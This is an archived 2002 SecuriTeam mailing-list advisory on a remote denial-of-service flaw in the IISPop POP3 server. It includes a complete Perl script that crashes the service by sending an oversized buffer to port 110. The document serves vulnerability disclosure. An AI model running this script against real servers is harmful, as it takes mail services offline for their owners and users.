[NT] IISPop Remote DoS
From: support@securiteam.com
Date: 11/17/02
- Previous message: support@securiteam.com: "[NEWS] Buffalo AP Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 17 Nov 2002 21:15:15 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
IISPop Remote DoS
------------------------------------------------------------------------
SUMMARY
<http://www.curtiscomp.com/> IISPop Email Server was designed for small
networks. This POP3 only server was designed to be paired with the SMTP
server bundled running under the Windows 2000 operating system. A
vulnerability in the product allows remote attackers to cause the server
to crash by sending it a large buffer.
DETAILS
Vulnerable systems:
* IISPop version 1.161 and 1.181
Exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl <host> \n";
exit;
}
$remo = $ARGV[0];
$buffer = "A" x 289999;
print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print "\tConnection Failed...\n";
exit;
}
print $so "$buffer\n";
close $so;
print "-->";
print "\tnow test if the distant host is down\n";
exit;
ADDITIONAL INFORMATION
The information has been provided by <mailto:securma@caramail.com>
securma massine.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[NT] TFTPD32 Directory Traversal Vulnerability"
- Previous message: support@securiteam.com: "[NEWS] Buffalo AP Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- IISPop remote DOS
... The IISPop EMail Server was ... I have found that IISpop is vulnerable
has a attack DOS ... Envoie un SMS avec le code PS au 61166 ... (Bugtraq) - Re: windows time slower than 10 mins
... SBS server sync with an external time source. ... This newsgroup only
focuses on SBS technical issues. ... -tz print the local time zone info and exit. ...
frequency determined during synchronization, then exit. ... (microsoft.public.windows.server.sbs) - Re: windows time slower than 10 mins
... I have windows 2000 server standard for DC ... -tz print the local time zone
info and exit. ... frequency determined during synchronization, then exit. ...
PLEASE NOTE the newsgroup SECURE CODE and PASSWORD were ... (microsoft.public.windows.server.sbs) - Re: Exiting without printing
... > Can someone direct me to the proper perldoc file which explains the easiest ...
> way to exit a Perl app? ... > I am writing a script that is run by the server
once an hour, ... It cause the Perl app to exit with a zero exit code, ... (comp.lang.perl.misc) - [NT] iCal Remote DoS and Path Disclosure
... so access calendar ... product allow remote attackers to reveal the true path
used in the server, ... The information in this bulletin is provided "AS IS" without
warranty of any kind. ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam)